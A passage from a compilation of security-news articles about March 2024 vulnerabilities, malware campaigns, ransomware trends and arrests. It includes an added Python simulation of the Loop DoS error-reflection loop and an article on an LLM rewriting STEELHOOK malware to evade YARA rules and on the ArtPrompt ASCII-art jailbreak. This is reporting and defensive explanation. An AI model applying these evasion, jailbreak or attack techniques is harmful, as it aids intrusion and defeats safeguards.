"SQL injection is possible when using the non-default connection property preferQueryMode=simple in combination with application code that has a vulnerable SQL that negates a parameter value," the maintainers said in an advisory last month.
"There is no vulnerability in the driver when using the default query mode. Users that do not override the query mode are not impacted."
The Atlassian vulnerability is said to have been introduced in the following versions of Bamboo Data Center and Server -
8.2.1
9.0.0
9.1.0
9.2.1
9.3.0
9.4.0, and
9.5.0
The company also emphasized that Bamboo and other Atlassian Data Center products are unaffected by CVE-2024-1597 as they do not use the PreferQueryMode=SIMPLE in their SQL database connection settings.
SonarSource security researcher Paul Gerste has been credited with discovering and reporting the flaw. Users are advised to update their instances to the latest version to protect against any potential threats.
New 'Loop DoS' Attack Impacts Hundreds of Thousands of Systems
21.3.24
Attack
The Hacker News
A novel denial-of-service (DoS) attack vector has been found to target application-layer protocols based on User Datagram Protocol (UDP), putting hundreds of thousands of hosts likely at risk.
Called Loop DoS attacks, the approach pairs "servers of these protocols in such a way that they communicate with each other indefinitely," researchers from the CISPA Helmholtz-Center for Information Security said.
UDP, by design, is a connectionless protocol that does not validate source IP addresses, making it susceptible to IP spoofing.
Thus, when attackers forge several UDP packets to include a victim IP address, the destination server responds to the victim (as opposed to the threat actor), creating a reflected denial-of-service (DoS) attack.
The latest study found that certain implementations of UDP-based application protocols, such as DNS, NTP, TFTP, Active Users, Daytime, Echo, Chargen, QOTD, and Time, can be weaponized to create a self-perpetuating attack loop.
"It pairs two network services in such a way that they keep responding to one another's messages indefinitely," the researchers said. "In doing so, they create large volumes of traffic that result in a denial-of-service for involved systems or networks. Once a trigger is injected and the loop set in motion, even the attackers are unable to stop the attack."
Put simply, given two application servers running a vulnerable version of the protocol, a threat actor can initiate communication with the first server by spoofing the address of the second server, causing the first server to respond to the victim (i.e., the second server) with an error message.
The victim, in turn, will also exhibit similar behavior, sending back another error message to the first server, effectively exhausting each other's resources and making either of the services unresponsive.
"If an error as input creates an error as output, and a second system behaves the same, these two systems will keep sending error messages back and forth indefinitely," Yepeng Pan and Christian Rossow explained.
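The loop condition is simple enough to model without a network. The following is an added example, not CISPA's code: two UDP application services are represented by handler functions, the attacker's only action is a single datagram delivered to one service with the source forged as the other, and the simulation follows the replies. The vulnerable handler answers every unrecognized datagram with an error, so the exchange runs until the cap; the hardened handler neither answers junk with an error nor answers a peer that claims a well-known service port, and the loop never starts. Port numbers and handler behaviour are illustrative and stand in for whatever real service is on each side.

```python
# Added example (not CISPA's code): a pure-Python model of a Loop DoS exchange.
# Services are handler functions; no sockets are used, so this runs anywhere.


class UdpService:
    """A UDP application server: handler(payload, src_port) -> reply bytes or None."""

    def __init__(self, name, port, handler):
        self.name, self.port, self.handler = name, port, handler
        self.sent = 0                        # datagrams this service has emitted

    def handle(self, payload, src_port):
        reply = self.handler(payload, src_port)
        if reply is not None:
            self.sent += 1
        return reply


def error_reflecting(payload, src_port):
    """Vulnerable behaviour: error in, error out, regardless of who sent it."""
    if payload.startswith(b"REQ "):
        return b"OK " + payload[4:]
    return b"ERR unrecognized request: " + payload[:32]


def loop_safe(payload, src_port):
    """Hardened behaviour: never answer a service port, never answer junk with an error."""
    if src_port < 1024:                      # a peer on a well-known port is another server, not a client
        return None
    if payload.startswith(b"REQ "):
        return b"OK " + payload[4:]
    return None                              # silently drop malformed input


def simulate_loop(a, b, trigger, max_datagrams=1000):
    """Deliver `trigger` to `a` with the source spoofed as `b`, then follow every reply.

    Returns how many datagrams the two services sent to each other before one of
    them stopped answering (or the cap was reached, meaning the loop is unbounded).
    """
    receiver, sender, payload = a, b, trigger
    sent = 0
    while payload is not None and sent < max_datagrams:
        payload = receiver.handle(payload, sender.port)
        if payload is not None:
            sent += 1
            receiver, sender = sender, receiver   # the reply is addressed to the other service
    return sent


def run_scenarios(cap=1000):
    """Vulnerable pair, hardened pair, and a mixed pair, all triggered by one spoofed datagram."""
    vuln_a = UdpService("chargen-like", 19, error_reflecting)
    vuln_b = UdpService("qotd-like", 17, error_reflecting)
    safe_a = UdpService("chargen-like", 19, loop_safe)
    safe_b = UdpService("qotd-like", 17, loop_safe)
    mixed_a = UdpService("chargen-like", 19, error_reflecting)
    return {
        "vulnerable-pair": simulate_loop(vuln_a, vuln_b, b"garbage", cap),
        "hardened-pair": simulate_loop(safe_a, safe_b, b"garbage", cap),
        "one-side-hardened": simulate_loop(mixed_a, safe_b, b"garbage", cap),
    }


if __name__ == "__main__":
    for scenario, count in run_scenarios().items():
        print(f"{scenario}: {count} datagrams exchanged")
```

The mixed scenario is the practical point: a single hardened side is enough to break the loop, which is why fixing one's own services helps even while the peer remains vulnerable, and why source-address filtering (BCP38) removes the trigger altogether.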
CISPA said an estimated 300,000 hosts and their networks can be abused to carry out Loop DoS attacks.
While there is currently no evidence that the attack has been weaponized in the wild, the researchers warned that exploitation is trivial and that multiple products from Broadcom, Cisco, Honeywell, Microsoft, MikroTik, and Zyxel are affected.
"Attackers need a single spoofing-capable host to trigger loops," the researchers noted. "As such, it is important to keep up initiatives to filter spoofed traffic, such as BCP38."
TeamCity Flaw Leads to Surge in Ransomware, Cryptomining, and RAT Attacks
20.3.24
Ransom
The Hacker News
Multiple threat actors are exploiting the recently disclosed security flaws in JetBrains TeamCity software to deploy ransomware, cryptocurrency miners, Cobalt Strike beacons, and a Golang-based remote access trojan called Spark RAT.
The attacks entail the exploitation of CVE-2024-27198 (CVSS score: 9.8) that enables an adversary to bypass authentication measures and gain administrative control over affected servers.
"The attackers are then able to install malware that can reach out to its command-and-control (C&C) server and perform additional commands such as deploying Cobalt Strike beacons and remote access trojans (RATs)," Trend Micro said in a new report.
"Ransomware can then be installed as a final payload to encrypt files and demand ransom payments from victims."
Following public disclosure of the flaw earlier this month, it has been weaponized by threat actors associated with BianLian and Jasmin ransomware families, as well as to drop the XMRig cryptocurrency miner and Spark RAT.
Organizations relying on TeamCity for their CI/CD processes are recommended to update their software as soon as possible to safeguard against potential threats.
The development comes as ransomware continues to be both formidable and profitable, with new strains like DoNex, Evil Ant, Lighter, RA World, and WinDestroyer emerging in the wild, even as notorious cybercrime crews like LockBit are still accepting affiliates into their program despite law enforcement actions against them.
WinDestroyer, in particular, stands out for its ability to encrypt files and render targeted systems unusable with no means to recover the data, raising the possibility that the threat actors behind it are geopolitically motivated.
"One of the major issues when tackling ransomware crime is the nature of the affiliate program, with actors often working for multiple RaaS outfits at a time," Cisco Talos said. "It's going to take persistent, strategic efforts to significantly damage RaaS operations and weaken the regenerative power of these gangs."
Data shared by the U.S. Federal Bureau of Investigation's (FBI) Internet Crime Complaint Center (IC3) shows that 2,825 ransomware infections were reported in 2023, causing adjusted losses of more than $59.6 million. Of these, 1,193 came from organizations belonging to a critical infrastructure sector.
The top five ransomware variants impacting critical infrastructure in the U.S. include LockBit, BlackCat (aka ALPHV or Noberus), Akira, Royal, and Black Basta.
Besides offering a bigger chunk of the proceeds to court affiliates, the landscape is witnessing increased collaboration between different ransomware groups that share their malicious tooling with each other.
These partnerships also manifest in the form of ghost groups, in which one ransomware operation outsources its skills to another, as seen in the case of Zeon, LockBit, and Akira.
Broadcom-owned Symantec, in a report published last week, revealed that "ransomware activity remains on an upward trend despite the number of attacks claimed by ransomware actors decreasing by slightly more than 20% in the fourth quarter of 2023."
According to statistics published by NCC Group, the total number of ransomware cases in February 2024 increased by 46% from January, up from 285 to 416, led by LockBit (33%), Hunters (10%), BlackCat (9%), Qilin (9%), BianLian (8%), Play (7%), and 8Base (7%).
"Recent law enforcement activity has the potential to polarize the ransomware landscape, creating clusters of smaller RaaS operators that are highly active and harder to detect due to their agility in underground forums and markets," Matt Hull, global head of threat intelligence at NCC Group, said.
"It appears that the attention drawn by the larger 'brand' ransomware, such as LockBit and Cl0p, is leading to new and small generic RaaS affiliate partnerships becoming the norm. As a result, detection and attribution could become harder, and affiliates may easily switch providers due to low entry thresholds and minimal monetary involvement."
Threat actors have also been finding novel ways to infect victims, mainly by exploiting vulnerabilities in public-facing applications, and to evade detection, as well as refining their tactics by increasingly relying on legitimate software and living-off-the-land (LotL) techniques.
Also popular among ransomware attackers are utilities like TrueSightKiller, GhostDriver, and Terminator, which leverage the Bring Your Own Vulnerable Driver (BYOVD) technique to disable security software.
"BYOVD attacks are attractive to threat actors, as they can provide a means by which to disable AV and EDR solutions at the kernel level," Sophos researchers Andreas Klopsch and Matt Wixey said in a report this month. "The sheer amount of known vulnerable drivers means that attackers have a wealth of options to choose from."
New BunnyLoader Malware Variant Surfaces with Modular Attack Features
20.3.24
Virus
The Hacker News
Cybersecurity researchers have discovered an updated variant of a stealer and malware loader called BunnyLoader that splits its various functions into modules and is designed to evade detection.
"BunnyLoader is dynamically developing malware with the capability to steal information, credentials and cryptocurrency, as well as deliver additional malware to its victims," Palo Alto Networks Unit 42 said in a report published last week.
The new version, dubbed BunnyLoader 3.0, was announced by its developer named Player (or Player_Bunny) on February 11, 2024, with rewritten modules for data theft, reduced payload size, and enhanced keylogging capabilities.
BunnyLoader was first documented by Zscaler ThreatLabz in September 2023, describing it as malware-as-a-service (MaaS) designed to harvest credentials and facilitate cryptocurrency theft. It was initially offered on a subscription basis for $250 per month.
The malware has since undergone frequent updates that are aimed at evading antivirus defenses as well as expanding on its data gathering functions, with BunnyLoader 2.0 released by the end of the same month.
The third generation of BunnyLoader goes a step further by not only incorporating new denial-of-service (DoS) features to mount HTTP flood attacks against a target URL, but also splitting its stealer, clipper, keylogger, and DoS modules into distinct binaries.
"Operators of BunnyLoader can choose to deploy these modules or use BunnyLoader's built-in commands to load their choice of malware," Unit 42 explained.
Infection chains delivering BunnyLoader have also become progressively more sophisticated, leveraging a previously undocumented dropper to load PureCrypter, which then forks into two separate branches.
While one branch launches the PureLogs loader to ultimately deliver the PureLogs stealer, the second attack sequence drops BunnyLoader to distribute another stealer malware called Meduza.
"In the ever changing landscape of MaaS, BunnyLoader continues to evolve, demonstrating the need for threat actors to frequently retool to evade detection," Unit 42 researchers said.
The development comes amid the continued use of SmokeLoader malware (aka Dofoil or Sharik) by a suspected Russian cybercrime crew called UAC-006 to target the Ukrainian government and financial entities. It's known to be active since 2011.
As many as 23 phishing attack waves delivering SmokeLoader were recorded between May and November 2023, according to an exhaustive report published by Ukraine's State Cyber Protection Center (SCPC).
"Primarily a loader with added information-stealing capabilities, SmokeLoader has been linked to Russian cybercrime operations and is readily available on Russian cybercrime forums," Unit 42 said.
Adding to BunnyLoader and SmokeLoader are two new information stealer malware codenamed Nikki Stealer and GlorySprout, the latter of which is developed in C++ and offered for $300 for a lifetime access. According to RussianPanda, the stealer is a clone of Taurus Stealer.
"A notable difference is that GlorySprout, unlike Taurus Stealer, does not download additional DLL dependencies from C2 servers," the researcher said. "Additionally, GlorySprout lacks the Anti-VM feature that is present in Taurus Stealer."
The findings also follow the discovery of a new variant of WhiteSnake Stealer that allows for the theft of critical sensitive data from compromised systems. "This new version has removed the string decryption code and made the code easy to understand," SonicWall said.
Ukraine Arrests Trio for Hijacking Over 100 Million Email and Instagram Accounts
20.3.24
Crime
The Hacker News
The Cyber Police of Ukraine has arrested three individuals on suspicion of hijacking more than 100 million email and Instagram accounts from users across the world.
The suspects, aged between 20 and 40, are said to be part of an organized criminal group living in different parts of the country. If convicted, they face up to 15 years in prison.
The accounts, authorities said, were taken over by carrying out brute-force attacks, which employ trial-and-error methods to guess login credentials. The group operated under the direction of a leader, who distributed the hacking tasks to other members.
The cybercrime group subsequently monetized their ill-gotten credentials by putting them up for sale on dark web forums.
Other threat actors who purchased the information used the compromised accounts to conduct a variety of fraudulent schemes, including those in which scammers reach out to the victim's friends to urgently transfer money to their bank account.
"You can protect your account from this method of hacking by setting up two-factor authentication and using strong passwords," the agency said.
As part of the operation, officials conducted seven searches in Kyiv, Odesa, Vinnytsia, Ivano-Frankivsk, Donetsk, and Kirovohrad, confiscating 70 computers, 14 phones, bank cards, and cash worth more than $3,000.
The development comes as a U.S. national pleaded guilty to breaching over a dozen entities in the U.S., including a medical clinic in Griffin, and exfiltrating the personal information of more than 132,000 individuals. He is scheduled for sentencing on June 18, 2024.
Robert Purbeck (aka Lifelock or Studmaster) "aggravated his crimes by weaponizing sensitive data in an egregious attempt to extort his victims," U.S. Attorney Ryan K. Buchanan said.
According to the U.S. Department of Justice (DoJ), Purbeck, who pleaded guilty today to federal charges of computer fraud and abuse, purchased access to the clinic's computer server from the darknet in 2017, leveraging it to siphon medical records and other documents that contained data pertaining to over 43,000 individuals, such as names, addresses, birthdates, and social security numbers.
The defendant also bought credentials associated with the City of Newnan, Georgia Police Department server on an underground marketplace. He then plundered records consisting of police reports and documents that had information belonging to no less than 14,000 people.
As part of the plea agreement, Purbeck agreed to pay more than $1 million in restitution to the 19 affected victims. He was indicted by a federal grand jury in March 2021.
U.S. EPA Forms Task Force to Protect Water Systems from Cyberattacks
20.3.24
BigBrothers
The Hacker News
The U.S. Environmental Protection Agency (EPA) said it's forming a new "Water Sector Cybersecurity Task Force" to devise methods to counter the threats faced by the water sector in the country.
"In addition to considering the prevalent vulnerabilities of water systems to cyberattacks and the challenges experienced by some systems in adopting best practices, this Task Force in its deliberations would seek to build upon existing collaborative products," the EPA said.
In a letter sent to all U.S. Governors, EPA Administrator Michael Regan and National Security Advisor Jake Sullivan highlighted the need to secure water and wastewater systems (WWS) from cyber attacks that could disrupt access to clean and safe drinking water.
At least two threat actors have been linked to intrusions targeting the nation's water systems, including those by an Iranian hacktivist group named Cyber Av3ngers as well as the China-linked Volt Typhoon, which has targeted communications, energy, transportation, and water and wastewater systems sectors in the U.S. and Guam for at least five years.
"Drinking water and wastewater systems are an attractive target for cyberattacks because they are a lifeline critical infrastructure sector but often lack the resources and technical capacity to adopt rigorous cybersecurity practices," Regan and Sullivan said.
The development coincides with the release of a new fact sheet from the U.S. Cybersecurity and Infrastructure Security Agency (CISA), urging critical infrastructure entities to defend against the "urgent risk posed by Volt Typhoon" by implementing secure-by-design principles, robust logging, safeguarding the supply chain, and increasing awareness of social engineering tactics.
"Volt Typhoon have been pre-positioning themselves on U.S. critical infrastructure organizations' networks to enable disruption or destruction of critical services in the event of increased geopolitical tensions and/or military conflict with the United States and its allies," the agency cautioned.
Cybersecurity firm SentinelOne, in a report published last month, revealed how China has launched an offensive media strategy to propagate "unsubstantiated" narratives around U.S. hacking operations for over two years.
"Repeating China's allegations helps the [People's Republic of China] shape global public opinion of the U.S. China wants to see the world recognize the U.S. as the 'empire of hacking,'" SentinelOne's China-focused consultant Dakota Cary said.
"The fact that China is lodging allegations of US espionage operations is still notable, providing insight into the relationship between the US and China, even if China does not support its claims."
From Deepfakes to Malware: AI's Expanding Role in Cyber Attacks
19.3.24
AI
The Hacker News
Large language models (LLMs) powering artificial intelligence (AI) tools today could be exploited to develop self-augmenting malware capable of bypassing YARA rules.
"Generative AI can be used to evade string-based YARA rules by augmenting the source code of small malware variants, effectively lowering detection rates," Recorded Future said in a new report shared with The Hacker News.
The findings are part of a red teaming exercise designed to uncover malicious use cases for AI technologies, which are already being experimented with by threat actors to create malware code snippets, generate phishing emails, and conduct reconnaissance on potential targets.
The cybersecurity firm said it submitted to an LLM a known piece of malware called STEELHOOK that's associated with the APT28 hacking group, alongside its YARA rules, asking it to modify the source code to sidestep detection such that the original functionality remained intact and the generated source code was syntactically free of errors.
Armed with this feedback mechanism, the altered malware generated by the LLM made it possible to avoid detections for simple string-based YARA rules.
There are limitations to this approach, the most prominent being the amount of text a model can process as input at one time, which makes it difficult to operate on larger code bases.
Besides modifying malware to fly under the radar, such AI tools could be used to create deepfakes impersonating senior executives and leaders and conduct influence operations that mimic legitimate websites at scale.
Furthermore, generative AI is expected to expedite threat actors' ability to carry out reconnaissance of critical infrastructure facilities and glean information that could be of strategic use in follow-on attacks.
"By leveraging multimodal models, public images and videos of ICS and manufacturing equipment, in addition to aerial imagery, can be parsed and enriched to find additional metadata such as geolocation, equipment manufacturers, models, and software versioning," the company said.
Indeed, Microsoft and OpenAI warned last month that APT28 used LLMs to "understand satellite communication protocols, radar imaging technologies, and specific technical parameters," indicating efforts to "acquire in-depth knowledge of satellite capabilities."
It's recommended that organizations scrutinize publicly accessible images and videos depicting sensitive equipment and scrub them, if necessary, to mitigate the risks posed by such threats.
The development comes as a group of academics has found that it's possible to jailbreak LLM-powered tools and produce harmful content by passing inputs in the form of ASCII art (e.g., "how to build a bomb," where the word BOMB is written using characters "*" and spaces).
The practical attack, dubbed ArtPrompt, weaponizes "the poor performance of LLMs in recognizing ASCII art to bypass safety measures and elicit undesired behaviors from LLMs."
Hackers Exploiting Popular Document Publishing Sites for Phishing Attacks
19.3.24
Exploit
The Hacker News
Threat actors are leveraging digital document publishing (DDP) sites hosted on platforms like FlipSnack, Issuu, Marq, Publuu, RelayTo, and Simplebooklet for carrying out phishing, credential harvesting, and session token theft, once again underscoring how threat actors are repurposing legitimate services for malicious ends.
"Hosting phishing lures on DDP sites increases the likelihood of a successful phishing attack, since these sites often have a favorable reputation, are unlikely to appear on web filter blocklists, and may instill a false sense of security in users who recognize them as familiar or legitimate," Cisco Talos researcher Craig Jackson said last week.
While adversaries have used popular cloud-based services such as Google Drive, OneDrive, Dropbox, SharePoint, DocuSign, and Oneflow to host phishing documents in the past, the latest development marks an escalation designed to evade email security controls.
DDP services allow users to upload and share PDF files in a browser-based interactive flipbook format, adding page flip animations and other skeuomorphic effects to any catalog, brochure, or magazine.
Threat actors have been found to abuse the free tier or a no-cost trial period offered by these services to create multiple accounts and publish malicious documents.
Besides exploiting their favorable domain reputation, the attackers take advantage of the fact that DDP sites facilitate transient file hosting, thereby allowing published content to automatically become unavailable after a predefined expiration date and time.
What's more, productivity features baked into DDP sites like Publuu could act as a deterrent, preventing the extraction and detection of malicious links in phishing messages.
In the incidents analyzed by Cisco Talos, DDP sites are integrated into the attack chain in the secondary or intermediate stage, typically by embedding a link to a document hosted on a legitimate DDP site in a phishing email.
The DDP-hosted document serves as a gateway to an external, adversary-controlled site either directly by clicking on a link included in the decoy file, or through a series of redirects that also require solving CAPTCHAs to thwart automated analysis efforts.
The final landing page is a bogus site mimicking the Microsoft 365 login page, thus allowing the attackers to steal credentials or session tokens.
"DDP sites could represent a blind spot for defenders, because they are unfamiliar to trained users and unlikely to be flagged by email and web content filtering controls," Jackson said.
"DDP sites create advantages for threat actors seeking to thwart contemporary phishing protections. The same features and benefits that attract legitimate users to these sites can be abused by threat actors to increase the efficacy of a phishing attack."
Suspected Russian Data-Wiping 'AcidPour' Malware Targeting Linux x86 Devices
19.3.24
Virus
The Hacker News
A new variant of a data wiping malware called AcidRain has been detected in the wild that's specifically designed for targeting Linux x86 devices.
The malware, dubbed AcidPour, is compiled for Linux x86 devices, SentinelOne's Juan Andres Guerrero-Saade said in a series of posts on X.
"The new variant [...] is an ELF binary compiled for x86 (not MIPS) and while it refers to similar devices/strings, it's a largely different codebase," Guerrero-Saade noted.
AcidRain first came to light in the early days of the Russo-Ukrainian war, with the malware deployed against KA-SAT modems from U.S. satellite company Viasat.
AcidRain, an ELF binary compiled for MIPS architectures, is capable of wiping the filesystem and different known storage device files by recursively iterating over common directories for most Linux distributions.
The cyber attack was subsequently attributed to Russia by the Five Eyes nations, along with Ukraine and the European Union.
AcidPour, as the new variant is called, is designed to erase content from RAID arrays and Unsorted Block Image (UBI) file systems through the addition of file paths like "/dev/dm-XX" and "/dev/ubiXX," respectively.
It's currently not clear who the intended victims are, although SentinelOne said it notified Ukrainian agencies. The exact scale of the attacks is presently unknown.
The discovery once again underscores the use of wiper malware to cripple targets, even as threat actors are diversifying their attack methods for maximum impact.
New Phishing Attack Uses Clever Microsoft Office Trick to Deploy NetSupport RAT
19.3.24
Phishing
The Hacker News
A new phishing campaign is targeting U.S. organizations with the intent to deploy a remote access trojan called NetSupport RAT.
Israeli cybersecurity company Perception Point is tracking the activity under the moniker Operation PhantomBlu.
"The PhantomBlu operation introduces a nuanced exploitation method, diverging from NetSupport RAT's typical delivery mechanism by leveraging OLE (Object Linking and Embedding) template manipulation, exploiting Microsoft Office document templates to execute malicious code while evading detection," security researcher Ariel Davidpur said.
NetSupport RAT is a malicious offshoot of a legitimate remote desktop tool known as NetSupport Manager, allowing threat actors to conduct a spectrum of data gathering actions on a compromised endpoint.
The starting point is a salary-themed phishing email that purports to be from the accounting department and urges recipients to open the attached Microsoft Word document to view the "monthly salary report."
A closer analysis of the email message headers – particularly the Return-Path and Message-ID fields – shows that the attackers use a legitimate email marketing platform called Brevo (formerly Sendinblue) to send the emails.
The Word document, upon opening, instructs the victim to enter a password provided in the email body and enable editing, followed by double-clicking a printer icon embedded in the doc to view the salary graph.
Doing so opens a ZIP archive file ("Chart20072007.zip") containing one Windows shortcut file, which functions as a PowerShell dropper to retrieve and execute a NetSupport RAT binary from a remote server.
"By using encrypted .docs to deliver the NetSupport RAT via OLE template and template injection, PhantomBlu marks a departure from the conventional TTPs commonly associated with NetSupport RAT deployments," Davidpur said, adding the updated technique "showcases PhantomBlu's innovation in blending sophisticated evasion tactics with social engineering."
Growing Abuse of Cloud Platforms and Popular CDNs
The development comes as Resecurity revealed that threat actors are increasingly abusing public cloud services like Dropbox, GitHub, IBM Cloud, and Oracle Cloud Storage, as well as Web 3.0 data-hosting platforms built on the InterPlanetary File System (IPFS) protocol such as Pinata to generate fully undetectable (FUD) phishing URLs using off-the-shelf kits.
Such FUD links are offered on Telegram by underground vendors like BulletProofLink, FUDLINKSHOP, FUDSENDER, ONNX, and XPLOITRVERIFIER for prices starting at $200 per month as part of a subscription model. These links are further secured behind antibot barriers to filter incoming traffic and evade detection.
Also complementing these services are tools like HeartSender that make it possible to distribute the generated FUD links at scale. The Telegram group associated with HeartSender has nearly 13,000 subscribers.
"FUD Links represent the next step in [phishing-as-a-service] and malware-deployment innovation," the company said, noting attackers are "repurposing high-reputation infrastructure for malicious use cases."
"One recent malicious campaign, which leveraged the Rhadamanthys Stealer to target the oil and gas sector, used an embedded URL that exploited an open redirect on legitimate domains, primarily Google Maps and Google Images. This domain-nesting technique makes malicious URLs less noticeable and more likely to entrap victims."
E-Root Marketplace Admin Sentenced to 42 Months for Selling 350K Stolen Credentials
19.3.24
Crime
The Hacker News
A 31-year-old Moldovan national has been sentenced to 42 months in prison in the U.S. for operating an illicit marketplace called E-Root Marketplace that offered for sale hundreds of thousands of compromised credentials, the Department of Justice (DoJ) announced.
Sandu Boris Diaconu was charged with conspiracy to commit access device and computer fraud and possession of 15 or more unauthorized access devices. He pleaded guilty on December 1, 2023.
"The E-Root Marketplace operated across a widely distributed network and took steps to hide the identities of its administrators, buyers, and sellers," the DoJ said last week.
"Buyers could search for compromised computer credentials on E-Root, such as usernames and passwords that would allow buyers to access remote computers for purposes of stealing private information or manipulating the contents of the remote computer."
Prospective customers could also search for RDP and SSH credentials based on various filter criteria such as price, geographic location, internet service provider, and operating system.
In an attempt to hide the transaction trails, the marketplace provided an online payment system called Perfect Money, which further made it possible to convert Bitcoin to and from Perfect Money. The infrastructure associated with E-Root and Perfect Money has since been seized by law enforcement as of late 2020.
More than 350,000 credentials are estimated to have been advertised for sale on the illegal marketplace, with many of the victims subjected to ransomware attacks and identity tax fraud schemes.
Diaconu, who served as the administrator between January 2015 and February 2020, was arrested in the U.K. in May 2021 while trying to flee the country. He was extradited to the U.S. in late October 2023.
The development comes as the DoJ also said it's recovering $2.3 million worth of cryptocurrency linked to a pig butchering romance scam that victimized at least 37 individuals across the U.S.
Such schemes seek to build trust with victims in online communications and then entice them into investing in a cryptocurrency scam under the guise of quick returns. Instead, the funds are diverted to the scammers' wallets, leading to financial losses.
According to Web3 anti-fraud company Scam Sniffer, approximately 57,000 victims have lost about $47 million to crypto phishing scams in the month of February 2024 alone.
"Compared to January, the number of victims who lost over $1 million decreased by 75%," it said in a series of posts on X (formerly Twitter). "Most victims were lured to phishing websites through phishing comments from impersonated Twitter accounts."
New DEEP#GOSU Malware Campaign Targets Windows Users with Advanced Tactics
19.3.24
Virus
The Hacker News
A new elaborate attack campaign has been observed employing PowerShell and VBScript malware to infect Windows systems and harvest sensitive information.
Cybersecurity company Securonix, which dubbed the campaign DEEP#GOSU, said it's likely associated with the North Korean state-sponsored group tracked as Kimsuky.
"The malware payloads used in the DEEP#GOSU represent a sophisticated, multi-stage threat designed to operate stealthily on Windows systems especially from a network-monitoring standpoint," security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a technical analysis shared with The Hacker News.
"Its capabilities included keylogging, clipboard monitoring, dynamic payload execution, and data exfiltration, and persistence using both RAT software for full remote access, scheduled tasks as well as self-executing PowerShell scripts using jobs."
A notable aspect of the infection procedure is that it leverages legitimate services such as Dropbox or Google Docs for command-and-control (C2), thus allowing the threat actor to blend undetected into regular network traffic.
On top of that, the use of such cloud services to stage the payloads allows for updating the functionality of the malware or delivering additional modules.
The starting point is said to be a malicious email attachment containing a ZIP archive with a rogue shortcut file (.LNK) that masquerades as a PDF file ("IMG_20240214_0001.pdf.lnk").
The .LNK file comes embedded with a PowerShell script as well as a decoy PDF document, with the former also reaching out to an actor-controlled Dropbox infrastructure to retrieve and execute another PowerShell script ("ps.bin").
The second-stage PowerShell script, for its part, fetches a new file from Dropbox ("r_enc.bin"), a .NET assembly file in binary form that's actually an open-source remote access trojan known as TruRat (aka TutRat or C# RAT) with capabilities to record keystrokes, manage files, and facilitate remote control.
It's worth noting that Kimsuky has employed TruRat in at least two campaigns uncovered by the AhnLab Security Intelligence Center (ASEC) last year.
Also retrieved by the PowerShell script from Dropbox is a VBScript ("info_sc.txt"), which, in turn, is designed to run arbitrary VBScript code retrieved from the cloud storage service, including a PowerShell script ("w568232.ps12x").
The VBScript is also designed to use Windows Management Instrumentation (WMI) to execute commands on the system, and set up scheduled tasks on the system for persistence.
Another noteworthy aspect of the VBScript is the use of Google Docs to dynamically retrieve configuration data for the Dropbox connection, allowing the threat actor to change the account information without having to alter the script itself.
The PowerShell script downloaded as a result is equipped to gather extensive information about the system and exfiltrate the details via a POST request to Dropbox.
"The purpose of this script appears to be designed to serve as a tool for periodic communication with a command-and-control (C2) server via Dropbox," the researchers said. "Its main purposes include encrypting and exfiltrating or downloading data."
In other words, it acts as a backdoor to control the compromised hosts and continuously keep a log of user activity, including keystrokes, clipboard content, and the foreground window.
The development comes as security researcher Ovi Liber detailed North Korea-linked ScarCruft's embedding of malicious code within Hangul Word Processor (HWP) lure documents present in phishing emails to distribute malware like RokRAT.
"The email contains a HWP Doc which has an embedded OLE object in the form of a BAT script," Liber said. "Once the user clicks on the OLE object, the BAT script executes which in turn creates a PowerShell-based reflective DLL injection attack on the victim's machine."
It also follows Andariel's exploitation of a legitimate remote desktop solution called MeshAgent to install malware like AndarLoader and ModeLoader, a JavaScript malware meant for command execution.
"This is the first confirmed use of a MeshAgent by the Andariel group," ASEC said. "The Andariel group has been continuously abusing the asset management solutions of domestic companies to distribute malware in the process of lateral movement, starting with Innorix Agent in the past."
Andariel, also known by the names Nickel Hyatt or Silent Chollima, is a sub-cluster within the notorious Lazarus Group, actively orchestrating attacks for both cyber espionage and financial gain.
The prolific state-sponsored threat actor has since been observed laundering a chunk of the crypto assets stolen from the hack of crypto exchange HTX and its cross-chain bridge (aka HECO Bridge) through Tornado Cash. The breach led to the theft of $112.5 million in cryptocurrency in November 2023.
"Following common crypto-laundering patterns, the stolen tokens were immediately swapped for ETH, using decentralized exchanges," Elliptic said. "The stolen funds then lay dormant until March 13, 2024, when the stolen crypto assets began to be sent through Tornado Cash."
The blockchain analytics firm said that Tornado Cash's continuation of its operations despite sanctions has likely made it an attractive proposition for the Lazarus Group to conceal its transaction trail following the shutdown of Sinbad in November 2023.
"The mixer operates through smart contracts running on decentralized blockchains, so it cannot be seized and shut down in the same way that centralized mixers such as Sinbad.io have been," it noted.
Fortra Patches Critical RCE Vulnerability in FileCatalyst Transfer Tool
18.3.24
Vulnerability
The Hacker News
Fortra has released details of a now-patched critical security flaw impacting its FileCatalyst file transfer solution that could allow unauthenticated attackers to gain remote code execution on susceptible servers.
Tracked as CVE-2024-25153, the shortcoming carries a CVSS score of 9.8 out of a maximum of 10.
"A directory traversal within the 'ftpservlet' of the FileCatalyst Workflow Web Portal allows files to be uploaded outside of the intended 'uploadtemp' directory with a specially crafted POST request," the company said in an advisory last week.
"In situations where a file is successfully uploaded to the web portal's DocumentRoot, specially crafted JSP files could be used to execute code, including web shells."
The vulnerability, the company said, was first reported on August 9, 2023, and addressed two days later in FileCatalyst Workflow version 5.1.6 Build 114 without a CVE identifier. Fortra was authorized as a CVE Numbering Authority (CNA) in early December 2023.
Security researcher Tom Wedgbury of LRQA Nettitude has been credited with discovering and reporting the flaw. The company has since released a full proof-of-concept (PoC) exploit, describing how the flaw could be weaponized to upload a web shell and execute arbitrary system commands.
Also resolved by Fortra in January 2024 are two other security vulnerabilities in FileCatalyst Direct (CVE-2024-25154 and CVE-2024-25155) that could lead to information leakage and code execution.
With previously disclosed flaws in Fortra GoAnywhere managed file transfer (MFT) coming under heavy exploitation last year by threat actors like Cl0p, it's recommended that users apply the necessary updates to mitigate potential threats.
Hackers Using Sneaky HTML Smuggling to Deliver Malware via Fake Google Sites
18.3.24
Virus
The Hacker News
Cybersecurity researchers have discovered a new malware campaign that leverages bogus Google Sites pages and HTML smuggling to distribute a commercial malware called AZORult in order to facilitate information theft.
"It uses an unorthodox HTML smuggling technique where the malicious payload is embedded in a separate JSON file hosted on an external website," Netskope Threat Labs researcher Jan Michael Alcantara said in a report published last week.
The phishing campaign has not been attributed to a specific threat actor or group. The cybersecurity company described it as widespread in nature, carried out with an intent to collect sensitive data for sale in underground forums.
AZORult, also called PuffStealer and Ruzalto, is an information stealer first detected around 2016. It's typically distributed via phishing and malspam campaigns, trojanized installers for pirated software or media, and malvertising.
